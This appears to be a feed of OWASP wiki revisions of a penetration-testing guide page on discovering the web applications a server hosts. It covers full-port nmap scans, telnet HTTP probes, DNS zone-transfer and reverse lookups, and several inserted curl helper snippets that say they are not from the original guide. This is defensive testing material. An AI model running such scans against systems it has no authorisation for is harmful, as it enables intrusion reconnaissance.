&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&amp;lt;br&amp;gt;&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
A common step in testing for vulnerabilities in a web presence is to find out which particular applications are hosted on a web server.&amp;lt;br/&amp;gt;&lt;br /&gt;
Many applications have known vulnerabilities and known attack strategies that can be exploited in order to gain remote control or to steal data.&amp;lt;br&amp;gt;&lt;br /&gt;
In addition, many applications are hosted on a web server without being referenced from the main website: this is often true for internal and/or extranet websites, which may be misconfigured or left unpatched due to the perception that they are used only &amp;quot;internally&amp;quot;.&amp;lt;br/&amp;gt;&lt;br /&gt;
Furthermore, many applications use common paths for administrative interfaces, which can be used to guess or brute-force administrative passwords.&lt;br /&gt;
&lt;br /&gt;
== Description of the Issue == &lt;br /&gt;
With the proliferation of virtual web servers, the traditional 1:1-type relationship between an IP address and a web server is losing much of its original significance. It is not uncommon to have multiple web sites / applications whose symbolic names resolve &lt;br /&gt;
to the same IP address (and this scenario is not limited to hosting environments, but applies to ordinary corporate environments as well).&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Sometimes you, as a security professional, are given a set of IP addresses (or possibly just one) as a target to test, with no other knowledge. It is arguable that this scenario is more akin to a pentest-type engagement, but in any case such an assignment is expected to test all web applications accessible through this target (and possibly other things). The problem is that the given IP address hosts an http service on port 80, but if you access it by specifying the IP address (which is all you know) it reports &amp;quot;No web &lt;br /&gt;
server configured at this address&amp;quot; or a similar message. Yet that system could &amp;quot;hide&amp;quot; a number of web applications, associated with unrelated symbolic (DNS) names. Obviously, the extent of your analysis is deeply affected by whether you test all of these applications, miss them entirely, or notice only some of them.&lt;br /&gt;
Sometimes the target specification is richer: maybe you are handed a list of IP addresses and their corresponding symbolic names. Nevertheless, this list might convey partial information, i.e. it could omit some symbolic names, and the client might not even be aware of that! (This is more likely to happen in large organizations.)&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Other issues affecting the scope of the assessment are represented by web applications published at non-obvious URLs (e.g., http://www.example.com/some-strange-URL), which are not referenced elsewhere. This may happen either by error (due to misconfigurations), or intentionally (for example, unadvertised administrative interfaces).&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
To address these issues it is necessary to perform a web application discovery.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Black Box testing and example ==&lt;br /&gt;
'''Web application discovery''' &amp;lt;br&amp;gt;&lt;br /&gt;
Web application discovery is a process aimed at identifying web applications on a given infrastructure. The latter is usually specified as a set of IP addresses (maybe a net block), but may also consist of a set of DNS symbolic names, or a mix of the two.&amp;lt;br&amp;gt;&lt;br /&gt;
This information is handed out prior to the execution of an assessment, be it a classic-style penetration test or an application-focused assessment. In both cases, unless the rules of engagement specify otherwise (e.g., “test only the application located at the URL http://www.example.com/”), the assessment should strive to be as comprehensive in scope as possible, i.e. it should, first of all, identify all the applications accessible through the given target. In the following we will examine a few techniques that can be employed to achieve this goal. &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;Notes&amp;lt;/u&amp;gt; Some of the following techniques apply to Internet-facing web servers, namely DNS and reverse-IP web-based search services and the use of search engines. Examples make use of private IP addresses (such as ''192.168.1.100'') which, unless indicated otherwise, represent ''generic'' IP addresses and are used only for anonymity purposes.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
There are two factors influencing how many applications are related to a given DNS name (or an IP address).&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''1. Different base URL''' &amp;lt;br&amp;gt;&lt;br /&gt;
The obvious entry point for a web application is ''www.example.com'', i.e. with this shorthand notation we think of the web application originating at http://www.example.com/ (the same applies for https). However, though this is the most common situation, there is nothing forcing the application to start at “/”.&amp;lt;br&amp;gt;&lt;br /&gt;
For example, the same symbolic name may be associated to three web applications such as &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url1 &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url2 &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url3 &amp;lt;br&amp;gt;&lt;br /&gt;
In this case the URL http://www.example.com/ would not be associated with a meaningful page, and the three applications would be “hidden” unless we explicitly know how to reach them, i.e. we know ''url1'', ''url2'' or ''url3''. Applications are usually published this way only when they are not meant to be reachable in a standard way and their users can be informed about their exact location. This doesn’t mean that these applications are secret, just that their existence and location are not explicitly advertised.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''2. Non-standard ports''' &amp;lt;br&amp;gt;&lt;br /&gt;
While web applications usually live on port 80 (http) and 443 (https), there is nothing magic about these port numbers. In fact, web applications may be associated with arbitrary TCP ports, and can be referenced by specifying the port number as follows: http[s]://www.example.com:port/. For example, http://www.example.com:20000/.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
There is another factor affecting how many web applications are related to a given IP address.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''3. Virtual hosts''' &amp;lt;br&amp;gt;&lt;br /&gt;
DNS allows a single IP address to be associated with one or more symbolic names. For example, the IP address ''192.168.1.100'' might be associated with the DNS names ''www.example.com, helpdesk.example.com, webmail.example.com'' (it is not necessary that all the names belong to the same DNS domain). This 1-to-N relationship may be used to serve different content through so-called virtual hosts. The information specifying the virtual host we are referring to is embedded in the HTTP 1.1 ''Host:'' header [1].&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
We would not suspect the existence of other web applications in addition to the obvious ''www.example.com'', unless we know of ''helpdesk.example.com'' and ''webmail.example.com''.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Approaches to address issue 1 - non-standard URLs'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
There is no foolproof way to ascertain the existence of non-standard-named web applications; being non-standard, there is no magic recipe that reveals them. However, a few criteria may aid the search.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
First, if the web server is misconfigured and allows directory browsing, it may be possible to spot these applications. Vulnerability scanners may help in this respect. &amp;lt;br&amp;gt;&lt;br /&gt;
Second, these applications might be referenced by other web pages; as such, there is a chance that they have been spidered and indexed by web search engines. If we suspect the existence of such “hidden” applications on ''www.example.com'' we could, for example, do a bit of googling using the ''site'' operator and examining the result of a query for “site: www.example.com”. Among the returned URLs there could be one pointing to such a non-obvious application.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Another option is to probe for URLs which are likely candidates for non-published applications. For example, a web mail front end might be accessible from https://www.example.com/webmail even though this URL is not referenced anywhere (after all, employees know where the webmail application is located, and there is no reason to reveal this to outsiders by publishing it on the corporate web site). The same holds for administrative interfaces, which may be published at standard URLs (for example, a Tomcat administrative interface) and yet not be referenced anywhere. So, doing a bit of dictionary-style searching (or “intelligent guessing”) could yield some results. Vulnerability scanners may help in this respect.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Approaches to address issue 2 - non-standard ports'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Existence of web applications on non-standard ports is easy to check. A port scanner such as nmap [2] is capable of performing service recognition by means of the -sV option, and will identify http[s] services on arbitrary ports. What is required is a full scan of the whole 64k TCP port address space.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
For example, the following command will look up, with a TCP connect scan, all open ports on IP ''192.168.1.100'' and will try to determine what services are bound to them (only ''essential'' switches are shown – nmap features a broad set of options, whose discussion is out of scope).&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
nmap -P0 -sT -sV -p1-65535 192.168.1.100&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
It is sufficient to examine the output, looking for http or an indication of SSL-wrapped services (which should be probed to confirm that they are https). For example, the output of the previous command could look like:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Interesting ports on 192.168.1.100:&lt;br /&gt;
(The 65527 ports scanned but not shown below are in state: closed)&lt;br /&gt;
PORT      STATE SERVICE     VERSION&lt;br /&gt;
22/tcp    open  ssh         OpenSSH 3.5p1 (protocol 1.99)&lt;br /&gt;
80/tcp    open  http        Apache httpd 2.0.40 ((Red Hat Linux))&lt;br /&gt;
443/tcp   open  ssl         OpenSSL&lt;br /&gt;
901/tcp   open  http        Samba SWAT administration server&lt;br /&gt;
1241/tcp  open  ssl         Nessus security scanner&lt;br /&gt;
3690/tcp  open  unknown&lt;br /&gt;
8000/tcp  open  http-alt?&lt;br /&gt;
8080/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
From this example, we see that&lt;br /&gt;
* There is an Apache http server running on port 80&lt;br /&gt;
* It looks like there is an https server on port 443 (but this needs to be confirmed; for example, by visiting https://192.168.1.100 with a browser)&lt;br /&gt;
* On port 901 there is a Samba SWAT web interface&lt;br /&gt;
* The service on port 1241 is not https, but is the SSL-wrapped Nessus daemon&lt;br /&gt;
* Port 3690 features an unspecified service (nmap gives back its ''fingerprint'' - here omitted for clarity - together with instructions to submit it for incorporation in the nmap fingerprint database, provided you know which service it represents)&lt;br /&gt;
* Another unspecified service on port 8000; this might be http, since it is not uncommon to find http servers on this port. Let's give it a look:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ telnet 192.168.1.100 8000&lt;br /&gt;
Trying 192.168.1.100...&lt;br /&gt;
Connected to 192.168.1.100.&lt;br /&gt;
Escape character is '^]'.&lt;br /&gt;
GET / HTTP/1.0&lt;br /&gt;
&lt;br /&gt;
HTTP/1.0 200 OK&lt;br /&gt;
pragma: no-cache&lt;br /&gt;
Content-Type: text/html&lt;br /&gt;
Server: MX4J-HTTPD/1.0&lt;br /&gt;
expires: now&lt;br /&gt;
Cache-Control: no-cache&lt;br /&gt;
&lt;br /&gt;
&amp;lt;html&amp;gt;&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
This confirms that it is in fact an HTTP server. Alternatively, we could have visited the URL with a web browser, or used the GET or HEAD Perl commands, which mimic HTTP interactions such as the one given above (note, however, that HEAD requests may not be honored by all servers).&lt;br /&gt;
* Apache Tomcat running on port 8080&lt;br /&gt;
&lt;br /&gt;
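Where a manual telnet session feels heavy-handed, the same confirmation can be scripted. The sketch below (not part of the original guide) assumes curl is available, and prints just the status line of a HEAD request against the example's IP and port:

```shell
# Quick check whether an open port speaks HTTP: issue a HEAD request
# and print only the status line. Some servers refuse HEAD, so a
# failure here is not conclusive -- fall back to a full GET.
is_http() {
  host=$1; port=$2
  # -s silent, -I HEAD request, --max-time bounds the probe
  curl -s -I --max-time 5 "http://$host:$port/" | head -n 1
}
# is_http 192.168.1.100 8000    # e.g. "HTTP/1.0 200 OK"
```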
The same task may be performed by vulnerability scanners – but first check that your scanner of choice is able to identify http[s] services running on non-standard ports. For example, Nessus [3] is capable of identifying them on arbitrary ports (provided you instruct it to scan all the ports), and will provide – in addition to what nmap offers – a number of tests on known web server vulnerabilities, as well as on the SSL configuration of https services. As hinted before, Nessus is also able to spot popular applications / web interfaces which could otherwise go unnoticed (for example, a Tomcat administrative interface).&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Approaches to address issue 3 - virtual hosts'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
There are a number of techniques which may be used to identify the DNS names associated with a given IP address ''x.y.z.t''.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;DNS zone transfers&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This technique is of limited use nowadays, since zone transfers are largely not honored by DNS servers, but it is worth a try. &amp;lt;br&amp;gt;&lt;br /&gt;
First of all, we must determine the name servers serving ''x.y.z.t''. If a symbolic name is known for ''x.y.z.t'' (let it be ''www.example.com''), its name servers can be determined by means of tools such as ''nslookup'', ''host'' or ''dig'' by requesting DNS NS records.&amp;lt;br&amp;gt;&lt;br /&gt;
If no symbolic names are known for ''x.y.z.t'', but your target definition contains at least a symbolic name, you may try to apply the same process and query the name server of that name (hoping that ''x.y.z.t'' will be served as well by that name server). For example, if your target consists of the IP address ''x.y.z.t'' and of ''mail.example.com'', determine the name servers for domain ''example.com''.&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Example: identifying www.owasp.org name servers by using host&lt;br /&gt;
&lt;br /&gt;
$ host -t ns www.owasp.org&lt;br /&gt;
www.owasp.org is an alias for owasp.org.&lt;br /&gt;
owasp.org name server ns1.secure.net.&lt;br /&gt;
owasp.org name server ns2.secure.net.&lt;br /&gt;
$&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Then a zone transfer may be requested from the name servers for domain ''example.com''; if you are lucky, you will get back a list of the DNS entries for this domain. This will include the obvious ''www.example.com'' and the not-so-obvious ''helpdesk.example.com'' and ''webmail.example.com'' (and possibly others). Check all names returned by the zone transfer and consider all of those which are related to the target being evaluated. &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Trying to request a zone transfer for owasp.org from one of its name servers&lt;br /&gt;
&lt;br /&gt;
$ host -l www.owasp.org ns1.secure.net&lt;br /&gt;
Using domain server:&lt;br /&gt;
Name: ns1.secure.net&lt;br /&gt;
Address: 192.220.124.10#53&lt;br /&gt;
Aliases:&lt;br /&gt;
&lt;br /&gt;
Host www.owasp.org not found: 5(REFUSED)&lt;br /&gt;
; Transfer failed.&lt;br /&gt;
-bash-2.05b$&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;DNS inverse queries&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This process is similar to the previous one, but relies on inverse (PTR) DNS records. Rather than requesting a zone transfer, try setting the record type to PTR and issue a query on the given IP address. If you are lucky, you may get back a DNS name entry. This technique relies on the existence of IP-to-symbolic-name maps, which is not guaranteed.&lt;br /&gt;
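As a minimal sketch (the address is the generic example one used elsewhere in this text), the in-addr.arpa name behind a PTR query can be built by hand, and dig can issue the lookup directly:

```shell
# Build the reverse (in-addr.arpa) name for an IPv4 address, as used
# by PTR queries: the four octets are reversed and the special
# in-addr.arpa suffix is appended.
reverse_name() {
  echo "$1" | awk -F. '{ print $4 "." $3 "." $2 "." $1 ".in-addr.arpa" }'
}
reverse_name 192.168.1.100      # prints 100.1.168.192.in-addr.arpa
# dig +short -x 192.168.1.100   # equivalent direct PTR query
```

In practice the `dig -x` one-liner is all that is needed; the function above only makes the naming convention explicit.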
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;Web-based DNS searches&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This kind of search is akin to a DNS zone transfer, but relies on web-based services that allow name-based searches on DNS. One such service is the ''Netcraft Search DNS'' service, available at http://searchdns.netcraft.com/?host. You may query for a list of names belonging to your domain of choice, such as ''example.com'', then check whether the names you obtained pertain to the target you are examining.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;Reverse-IP services&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
Reverse-IP services are similar to DNS inverse queries, with the difference that you query a web-based application instead of a name server. There are a number of such services available. Since they tend to return partial (and often different) results, it is better to use multiple services to obtain a more comprehensive analysis.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
''Domain tools reverse IP'': http://www.domaintools.com/reverse-ip/ &amp;lt;br&amp;gt;&lt;br /&gt;
(requires free membership) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''MSN search'': http://search.msn.com &amp;lt;br&amp;gt;&lt;br /&gt;
syntax: &amp;quot;ip:x.x.x.x&amp;quot; (without the quotes) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''Webhosting info'': http://whois.webhosting.info/ &amp;lt;br&amp;gt; &lt;br /&gt;
syntax: http://whois.webhosting.info/x.x.x.x &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''DNSstuff'': http://www.dnsstuff.com/ &amp;lt;br&amp;gt;&lt;br /&gt;
(multiple services available) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
http://net-square.com/msnpawn/index.shtml &amp;lt;br&amp;gt;&lt;br /&gt;
(multiple queries on  domains and IP addresses, requires installation) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''tomDNS'': http://www.tomdns.net/ &amp;lt;br&amp;gt;&lt;br /&gt;
(some services are still private at the time of writing) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''SEOlogs.com'': http://www.seologs.com/ip-domains.html &amp;lt;br&amp;gt;&lt;br /&gt;
(reverse ip/domain lookup) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Image:Owasp-Info.jpg]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;Googling&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
After you have gathered as much information as you can with the previous techniques, you can rely on search engines to possibly refine and extend your analysis. This may yield evidence of additional symbolic names belonging to your target, or applications accessible via non-obvious URLs.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Gray Box testing and example == &lt;br /&gt;
Not applicable. The methodology remains the same as listed in Black Box testing, no matter how much information you start with.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
[1] RFC 2616 – Hypertext Transfer Protocol – HTTP 1.1 &amp;lt;br&amp;gt;&lt;br /&gt;
[2] nmap, http://www.insecure.org &amp;lt;br&amp;gt;&lt;br /&gt;
[3] Nessus Vulnerability Scanner, http://www.nessus.org &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Whitepapers'''&amp;lt;br&amp;gt;&lt;br /&gt;
...&amp;lt;br&amp;gt;&lt;br /&gt;
'''Tools'''&amp;lt;br&amp;gt;&lt;br /&gt;
DNS lookup tools such as ''nslookup'', ''dig'' or similar. &amp;lt;br&amp;gt;&lt;br /&gt;
Port scanners (such as nmap, http://www.insecure.org) and vulnerability scanners (such as Nessus: http://www.nessus.org; wikto: http://www.sensepost.com/research/wikto/). &amp;lt;br&amp;gt;&lt;br /&gt;
Search engines (Google, and other major engines). &amp;lt;br&amp;gt;&lt;br /&gt;
Specialized DNS-related web-based search service: see text.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Bregolin</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=File:Owasp-Info.jpg&amp;diff=12424</id>
		<title>File:Owasp-Info.jpg</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=File:Owasp-Info.jpg&amp;diff=12424"/>
				<updated>2006-11-13T08:02:45Z</updated>
		
		<summary type="html">&lt;p&gt;Bregolin: Querying webhosting.info WHOIS Service for 216.48.3.18, the address of www.owasp.org, produces three additional symbolic names we might not have been aware of.&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Querying webhosting.info WHOIS Service for 216.48.3.18, the address of www.owasp.org, produces three additional symbolic names we might not have been aware of.&lt;/div&gt;</summary>
		<author><name>Bregolin</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Enumerate_Applications_on_Webserver_(OTG-INFO-004)&amp;diff=12423</id>
		<title>Enumerate Applications on Webserver (OTG-INFO-004)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Enumerate_Applications_on_Webserver_(OTG-INFO-004)&amp;diff=12423"/>
				<updated>2006-11-13T07:41:41Z</updated>
		
		<summary type="html">&lt;p&gt;Bregolin: /* Description of the Issue */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&amp;lt;br&amp;gt;&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
A common step for testing vulnerabilities in a web presence is to find out which particular applications are hosted on a web server.&amp;lt;br/&amp;gt;&lt;br /&gt;
Many different applications, in fact, have known vulnerabilities and known attack strategies that can be exploited in order to gain remote control or to extract data.&amp;lt;br&amp;gt;&lt;br /&gt;
In addition to this, many applications are often hosted on a particular web server without any reference from the main website: this is true for internal and/or extranet websites, which may be misconfigured or left unpatched due to the perception that they are used only &amp;quot;internally&amp;quot;.&amp;lt;br/&amp;gt;&lt;br /&gt;
Furthermore, many applications use common paths for administrative interfaces, which can be used to guess or brute-force administrative passwords.&lt;br /&gt;
&lt;br /&gt;
== Description of the Issue == &lt;br /&gt;
With the proliferation of virtual web servers, the traditional 1:1-type relationship between an IP address and a web server is losing much of its original significance. It is not uncommon to have multiple web sites / applications whose symbolic names resolve &lt;br /&gt;
to the same IP address (and this scenario is not limited to hosting environments, but applies to ordinary corporate environments as well).&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Sometimes you, as a security professional, are given a set of IP addresses (or possibly just one) as a target to test, with no other knowledge. It is arguable that this scenario is more akin to a pentest-type engagement, but in any case it is expected that such an assignment would test all web applications accessible through this target (and possibly other things). The problem is, the given IP address hosts an http service on port 80, but if you access it by specifying the IP address (which is all you know) it reports &amp;quot;No web &lt;br /&gt;
server configured at this address&amp;quot; or a similar message. But that system could &amp;quot;hide&amp;quot; a bunch of web applications, associated with unrelated symbolic (DNS) names. Obviously, the extent of your analysis is deeply affected by whether or not you test these applications - and you might fail to notice them, or notice only some of them.&lt;br /&gt;
Sometimes the target specification is richer – maybe you are handed a list of IP addresses and their corresponding symbolic names. Nevertheless, this list might convey partial information, i.e. it could omit some symbolic names – and the client might not even be aware of that! (This is more likely to happen in large organizations.)&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Other issues affecting the scope of the assessment are represented by web applications published at non-obvious URLs (e.g., http://www.example.com/some-strange-URL), which are not referenced elsewhere. This may happen either by error (due to misconfigurations), or intentionally (for example, unadvertised administrative interfaces).&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
To address these issues it is necessary to perform a web application discovery.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Black Box testing and example ==&lt;br /&gt;
'''Web application discovery''' &amp;lt;br&amp;gt;&lt;br /&gt;
Web application discovery is a process aimed at identifying web applications on a given infrastructure. The latter is usually specified as a set of IP addresses (maybe a net block), but may also consist of a set of DNS symbolic names, or a mix of the two.&amp;lt;br&amp;gt;&lt;br /&gt;
This information is handed out prior to the execution of an assessment, be it a classic-style penetration test or an application-focused assessment. In both cases, unless the rules of engagement specify otherwise (e.g., “test only the application located at the URL http://www.example.com/”), the assessment should strive to be as comprehensive in scope as possible, i.e. it should, first of all, identify all the applications accessible through the given target. In the following we will examine a few techniques that can be employed to achieve this goal. &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;Notes&amp;lt;/u&amp;gt; Some of the following techniques apply to Internet-facing web servers, namely DNS and reverse-IP web-based search services and the use of search engines. Examples make use of private IP addresses (such as ''192.168.1.100'') which, unless indicated otherwise, represent ''generic'' IP addresses and are used only for anonymity purposes.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
There are two factors influencing how many applications are related to a given DNS name (or an IP address).&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''1. Different base URL''' &amp;lt;br&amp;gt;&lt;br /&gt;
The obvious entry point for a web application is ''www.example.com'', i.e. with this shorthand notation we think of the web application originating at http://www.example.com/ (the same applies for https). However, though this is the most common situation, there is nothing forcing the application to start at “/”.&amp;lt;br&amp;gt;&lt;br /&gt;
For example, the same symbolic name may be associated to three web applications such as &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url1 &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url2 &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url3 &amp;lt;br&amp;gt;&lt;br /&gt;
In this case the URL http://www.example.com/ would not be associated with a meaningful page, and the three applications would be “hidden” unless we explicitly know how to reach them, i.e. we know ''url1'', ''url2'' or ''url3''. There is usually no need to publish web applications in this way, unless you don’t want them to be accessible in a standard way, and you are prepared to inform your users about their exact location. This doesn’t mean that these applications are secret, but that their existence and location are not explicitly advertised.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''2. Non-standard ports''' &amp;lt;br&amp;gt;&lt;br /&gt;
While web applications usually live on port 80 (http) and 443 (https), there is nothing magic about these port numbers. In fact, web applications may be associated with arbitrary TCP ports, and can be referenced by specifying the port number as follows: http[s]://www.example.com:port/. For example, http://www.example.com:20000/.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
There is another factor affecting how many web applications are related to a given IP address.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''3. Virtual hosts''' &amp;lt;br&amp;gt;&lt;br /&gt;
DNS allows a single IP address to be associated with one or more symbolic names. For example, the IP address ''192.168.1.100'' might be associated with the DNS names ''www.example.com, helpdesk.example.com, webmail.example.com'' (actually, it is not necessary that all the names belong to the same DNS domain). This 1-to-N relationship may be used to serve different content by means of so-called virtual hosts. The information specifying the virtual host we are referring to is embedded in the HTTP 1.1 ''Host:'' header [1].&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
We would not suspect the existence of other web applications in addition to the obvious ''www.example.com'', unless we know of ''helpdesk.example.com'' and ''webmail.example.com''.&lt;br /&gt;
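Once candidate names are known (e.g., from the DNS techniques described later in this text), their mapping to virtual hosts can be checked by requesting the same IP while varying the Host header. This sketch is not part of the original guide; it assumes curl is available, and the names and IP are the illustrative ones above:

```shell
# Probe an IP for virtual hosts: request the same URL while varying
# the Host header, and report the status code for each candidate name.
probe_vhosts() {
  ip=$1; shift
  for name in "$@"; do
    # -s silent, -o /dev/null discard body, -w print only the status code
    code=$(curl -s -o /dev/null -w '%{http_code}' -H "Host: $name" "http://$ip/")
    echo "$name -> HTTP $code"
  done
}
# probe_vhosts 192.168.1.100 www.example.com helpdesk.example.com webmail.example.com
```

Differing status codes (or response sizes) across names hint at distinct virtual hosts being served from the same address.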
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Approaches to address issue 1 - non-standard URLs'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
There is no foolproof way to ascertain the existence of non-standard-named web applications. Being non-standard, there is no magic recipe for finding them. However, we may employ a few criteria that will aid in the search.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
First, if the web server is misconfigured and allows directory browsing, it may be possible to spot these applications. Vulnerability scanners may help in this respect. &amp;lt;br&amp;gt;&lt;br /&gt;
Second, these applications might be referenced by other web pages; as such, there is a chance that they have been spidered and indexed by web search engines. If we suspect the existence of such “hidden” applications on ''www.example.com'' we could, for example, do a bit of googling using the ''site'' operator and examine the results of a query for “site:www.example.com”. Among the returned URLs there could be one pointing to such a non-obvious application.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Another option is to probe for URLs which might be likely candidates for non-published applications. For example, a web mail front end might be accessible from https://www.example.com/webmail, even though this URL is not referenced anywhere (after all, employees know where the webmail application is located, and there is no reason to advertise it to outsiders by publishing it on the corporate web site). The same holds for administrative interfaces, which may be published at standard URLs (for example: a Tomcat administrative interface) and yet not be referenced anywhere. So, a bit of dictionary-style searching (or “intelligent guessing”) could yield some results. Vulnerability scanners may help in this respect.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Approaches to address issue 2 - non-standard ports'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
The existence of web applications on non-standard ports is easy to check. A port scanner such as nmap [2] is capable of performing service recognition by means of the -sV option, and will identify http[s] services on arbitrary ports. What is required is a full scan of the whole 64k TCP port address space.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
For example, the following command will look up, with a TCP connect scan, all open ports on IP ''192.168.1.100'' and will try to determine what services are bound to them (only ''essential'' switches are shown – nmap features a broad set of options, whose discussion is out of scope).&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
nmap -P0 -sT -sV -p1-65535 192.168.1.100&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
It is sufficient to examine the output and look for http or for the indication of SSL-wrapped services (which should be probed to confirm that they are https). For example, the output of the previous command could look like:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Interesting ports on 192.168.1.100:&lt;br /&gt;
